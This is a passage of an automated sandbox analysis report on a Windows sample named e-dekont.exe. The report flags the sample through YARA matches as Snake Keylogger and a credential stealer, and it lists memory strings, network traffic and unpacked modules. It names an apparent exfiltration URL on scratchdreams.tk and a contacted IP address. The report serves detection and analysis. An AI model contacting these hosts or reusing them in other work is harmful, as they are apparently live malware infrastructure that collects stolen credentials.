            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            .NET source code contains very large array initializations
            Source: 0.2.e-dekont.exe.2b052b4.1.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
            Source: 0.2.e-dekont.exe.73b0000.12.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_0295DA4C0_2_0295DA4C
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_050668800_2_05066880
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_050601200_2_05060120
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_050601300_2_05060130
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_050668700_2_05066870
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F7F500_2_073F7F50
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F7C480_2_073F7C48
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F3BF00_2_073F3BF0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F4AB00_2_073F4AB0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F29100_2_073F2910
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F36500_2_073F3650
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073FC4CC0_2_073FC4CC
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073FC3100_2_073FC310
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073FC3010_2_073FC301
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073FA2000_2_073FA200
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F318A0_2_073F318A
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073FA1F00_2_073FA1F0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073FA1C90_2_073FA1C9
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F6E000_2_073F6E00
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F8EE00_2_073F8EE0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F8ED00_2_073F8ED0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F1DF00_2_073F1DF0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F7C380_2_073F7C38
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F2BE10_2_073F2BE1
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F6BC80_2_073F6BC8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F59A00_2_073F59A0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F59900_2_073F5990
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F49C10_2_073F49C1
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F68480_2_073F6848
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F28890_2_073F2889
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_076191800_2_07619180
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_076100400_2_07610040
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_07614D180_2_07614D18
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_076155F00_2_076155F0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_07612CA80_2_07612CA8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_0761001E0_2_0761001E
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_076148E00_2_076148E0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_076130D00_2_076130D0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCB3882_2_02DCB388
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCC1F02_2_02DCC1F0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DC61682_2_02DC6168
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DC67902_2_02DC6790
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCC7B12_2_02DCC7B1
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCC4D02_2_02DCC4D0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCCA912_2_02DCCA91
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DC4B312_2_02DC4B31
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DC98B82_2_02DC98B8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCBF102_2_02DCBF10
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCBC322_2_02DCBC32
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCF4E82_2_02DCF4E8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DC35C82_2_02DC35C8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCB5522_2_02DCB552
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCEA082_2_02DCEA08
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCE9F82_2_02DCE9F8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DCF9412_2_02DCF941
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B444902_2_05B44490
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B489B02_2_05B489B0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B490802_2_05B49080
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B41DE02_2_05B41DE0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B41DD02_2_05B41DD0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B415202_2_05B41520
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4F5282_2_05B4F528
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B415102_2_05B41510
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4F5182_2_05B4F518
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4C5602_2_05B4C560
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4C5502_2_05B4C550
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B444862_2_05B44486
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4EC782_2_05B4EC78
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B40C602_2_05B40C60
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4EC692_2_05B4EC69
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B40C502_2_05B40C50
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4DF702_2_05B4DF70
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4DF602_2_05B4DF60
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4D6B02_2_05B4D6B0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4D6C02_2_05B4D6C0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4CE102_2_05B4CE10
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4CE012_2_05B4CE01
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4C9B82_2_05B4C9B8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4C9A92_2_05B4C9A9
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B419802_2_05B41980
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4F9802_2_05B4F980
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4C1082_2_05B4C108
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B419702_2_05B41970
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4F9712_2_05B4F971
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B410B02_2_05B410B0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4C0F72_2_05B4C0F7
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4F0D02_2_05B4F0D0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B410C02_2_05B410C0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4F0C02_2_05B4F0C0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4E8202_2_05B4E820
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B400112_2_05B40011
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4E8112_2_05B4E811
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B480082_2_05B48008
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B400402_2_05B40040
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4E3B92_2_05B4E3B9
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4E3C82_2_05B4E3C8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4DB182_2_05B4DB18
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4DB092_2_05B4DB09
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4D2682_2_05B4D268
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4D2582_2_05B4D258
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0DAC02_2_06C0DAC0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0AEA82_2_06C0AEA8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C08A582_2_06C08A58
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0CE282_2_06C0CE28
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0C7D82_2_06C0C7D8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0BB382_2_06C0BB38
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0B4F02_2_06C0B4F0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C090912_2_06C09091
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C074A02_2_06C074A0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0A8582_2_06C0A858
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0D4782_2_06C0D478
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C015F82_2_06C015F8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0C1882_2_06C0C188
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C05EC02_2_06C05EC0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0AE982_2_06C0AE98
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0DAAF2_2_06C0DAAF
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C05EB02_2_06C05EB0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C08A482_2_06C08A48
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C05A582_2_06C05A58
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C05A682_2_06C05A68
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C086002_2_06C08600
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0CE182_2_06C0CE18
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C06BC82_2_06C06BC8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0C7C92_2_06C0C7C9
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C037FA2_2_06C037FA
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C03B802_2_06C03B80
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C06BB82_2_06C06BB8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C067602_2_06C06760
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C067702_2_06C06770
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C063082_2_06C06308
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C063182_2_06C06318
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0BB272_2_06C0BB27
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0B4E02_2_06C0B4E0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C008E12_2_06C008E1
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C078E72_2_06C078E7
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C008F02_2_06C008F0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C078F82_2_06C078F8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C048802_2_06C04880
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C004882_2_06C00488
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C074902_2_06C07490
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C004982_2_06C00498
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C000402_2_06C00040
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0A8482_2_06C0A848
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C02C682_2_06C02C68
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0D4682_2_06C0D468
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C000072_2_06C00007
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C038082_2_06C03808
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C070102_2_06C07010
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C070202_2_06C07020
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C055D92_2_06C055D9
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C055E82_2_06C055E8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C085F12_2_06C085F1
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C011912_2_06C01191
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0819A2_2_06C0819A
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C011A02_2_06C011A0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C081A82_2_06C081A8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C07D402_2_06C07D40
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C00D482_2_06C00D48
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C07D502_2_06C07D50
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0C1782_2_06C0C178
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C00D382_2_06C00D38
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C2043C2_2_06C2043C
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C235702_2_06C23570
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C2BFEC2_2_06C2BFEC
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C2DC482_2_06C2DC48
            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1666058439.00000000073B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000000.1635678271.000000000078E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewGVE.exeB vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1660508075.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1660508075.0000000002C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1663643804.0000000004AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1659851365.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont.exe
            Source: e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont.exe
            Source: e-dekont.exe, 00000002.00000002.4086498385.0000000000DD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs e-dekont.exe
            Source: e-dekont.exeBinary or memory string: OriginalFilenamewGVE.exeB vs e-dekont.exe
            Source: e-dekont.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
